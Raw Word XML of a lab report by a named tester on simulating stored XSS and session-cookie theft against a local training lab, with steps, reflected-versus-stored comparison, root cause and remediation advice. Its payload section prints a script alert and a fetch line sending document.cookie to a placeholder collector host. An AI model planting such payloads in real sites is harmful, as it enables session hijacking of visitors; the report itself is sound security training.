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D0E52" w14:textId="4F90E947" w:rsidR="00CD1729" w:rsidRDefault="007A6B42" w:rsidP="00901CAB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Stored XSS &amp; Session Hijacking Simulation Repor</w:t>
      </w:r>
      <w:r w:rsidR="00901CAB">
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B1D74" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="00CD1729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D1729" w14:paraId="78A85794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5D7C9" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tester name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42265" w14:textId="659B9626" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00901CAB">
              <w:t>KABA PETER NEBA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD1729" w14:paraId="4DA8CDE4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252C5" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target application / URL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E037D" w14:textId="6C4E3CC5" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00901CAB">
              <w:t>local XSS Training Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C706BA1" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EE52A" w14:textId="287F9DD5" w:rsidR="00CD1729" w:rsidRDefault="007A6B42" w:rsidP="00901CAB">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Identify a stored XSS vulnerability in a persistent input field (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> guestbook/comment), inject a payload that executes against any user who later views the page, and simulate exfiltration of a session cookie to an attacker-controlled listener without further victim interaction</w:t>
      </w:r>
      <w:r w:rsidR="00901CAB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFA6D54" w14:textId="3ADA1A91" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. Steps Performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540E6A9" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Locate the persistent input field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DDD59D" w14:textId="43053F51" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Identif</w:t>
      </w:r>
      <w:r w:rsidR="00214D67">
        <w:t xml:space="preserve">ied </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00214D67">
        <w:t xml:space="preserve">“message” </w:t>
      </w:r>
      <w:r>
        <w:t>field whose submitted value is stored server-side and re-displayed to other users later (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> guestbook author/body).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CD1729" w14:paraId="555B8851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5890F3" w14:textId="21064409" w:rsidR="00CD1729" w:rsidRDefault="00EF5111">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7841B1EF" wp14:editId="77BB1B8F">
                  <wp:extent cx="6400800" cy="380555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D7480" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592B0B25" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63577091" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C865A9F" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="394F4779" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3175D243" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10101DFF" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33896C9C" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 1: The guestbook submission form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1866B4" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Submit a proof-of-concept payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5528CC8C" w14:textId="29BED257" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidR="00214D67">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a script payload into the field and reload the page to confirm it executes on render rather than being escaped.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1729" w14:paraId="1C9FE346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C09CD" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Insert screenshot </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>here ]</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2F50C960" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494A41CA" w14:textId="3C4BC02F" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D51B1C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411890CC" wp14:editId="2E4ED9CF">
                  <wp:extent cx="5524245" cy="2701290"/>
                  <wp:effectExtent l="0" t="0" r="63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282" cy="270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ABB06" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C75AA73" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0918CC61" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17656D79" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29257255" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CDEB757" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 2: Alert box confirming stored payload executes on page load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015DD40D" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7CAC40" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC21352" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C648ED8" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA34BB0" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F114E87" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2208905B" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9B8C99" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C71089" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472C6650" w14:textId="566DA7B1" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Confirm persistence across sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DDF83" w14:textId="50EFEC5B" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Reload</w:t>
      </w:r>
      <w:r w:rsidR="00214D67">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r>
        <w:t>the page in a second browser or incognito window (simulating a different victim) and confirm the payload fires there too, with no further action from the attacker.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CD1729" w14:paraId="513BBF3D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544CE6" w14:textId="1F4B420B" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Insert screenshot </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>here ]</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6E17091D" w14:textId="7CA24182" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00214D67">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77B81A13" wp14:editId="6CCD42DC">
                  <wp:extent cx="6400800" cy="3178175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59D84" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C388DB9" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A1B199" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262707AF" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425E9AE4" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42690042" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C246A23" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 3: Payload executing in a second/incognito session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08BEE6" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Set up the listener / collector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F65A7" w14:textId="440510C7" w:rsidR="00CD1729" w:rsidRDefault="007A6B42" w:rsidP="00D51B1C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stand up a simple local listener </w:t>
      </w:r>
      <w:r w:rsidR="00214D67">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>hat logs any data sent to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D6AD5" w14:textId="77777777" w:rsidR="00D51B1C" w:rsidRDefault="00D51B1C" w:rsidP="00D51B1C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A3967F" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5B748C" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A39977" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7654C450" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6043034F" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9436AF" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5F3303" w14:textId="77777777" w:rsidR="00214D67" w:rsidRDefault="00214D67">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719BB29F" w14:textId="0D02CC2B" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 5: Exfiltrate the simulated session cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2080BC" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update the payload to read </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and send it to the listener. Reload the page as the 'victim' and confirm the cookie value is received by the listener.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CD1729" w14:paraId="6D77B8CB" w14:textId="77777777"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7999E" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Insert screenshot </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>here ]</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4FCD1CD6" w14:textId="3F1DFDE6" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD820CD" w14:textId="046A6081" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00214D67">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0004E69F" wp14:editId="57100640">
                  <wp:extent cx="6400800" cy="25431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F10E5" w14:textId="4F9451ED" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE7F269" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604BA273" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50A3FCBA" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E235B70" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24F92D2C" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:before="80" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Figure 5: Listener log showing the received cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646BA58" w14:textId="3A2CBB36" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. Payload(s)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1729" w14:paraId="0B5504BF" w14:textId="77777777"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676EC6" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35119399" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;script&gt;alert(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document.domain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)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E581D1C" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="00CD1729"/>
          <w:p w14:paraId="1561B4C9" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>Cookie exfiltration (posted as the comment body):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60612F00" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;script&gt;fetch('http://&lt;collector-host&gt;/collector?data='+</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AE95576" w14:textId="43D08FA5" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. Reflected vs. Stored XSS — Persistence &amp; Blast Radius</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480722C" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Reflected: payload lives only in the request; requires delivering a crafted link to each victim individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8E7D1" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Stored: payload is saved server-side and served automatically to every visitor of the affected page, including future visitors, until removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1EAA3" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Note in your own words why this made the stored case higher impact / higher severity in your assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10231B0D" w14:textId="73EE0439" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD17F2B" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The application saves user input without validation and re-renders it without output encoding, so the browser executes attacker-controlled markup for every subsequent viewer of the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59085180" w14:textId="5E964AED" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B7886" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply output encoding at render time for all stored/user-generated content; never bypass framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autoescaping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB86BF" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Validate/sanitize input on the way in (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>allowlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> expected format, or sanitize rich text with a vetted library such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOMPurify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
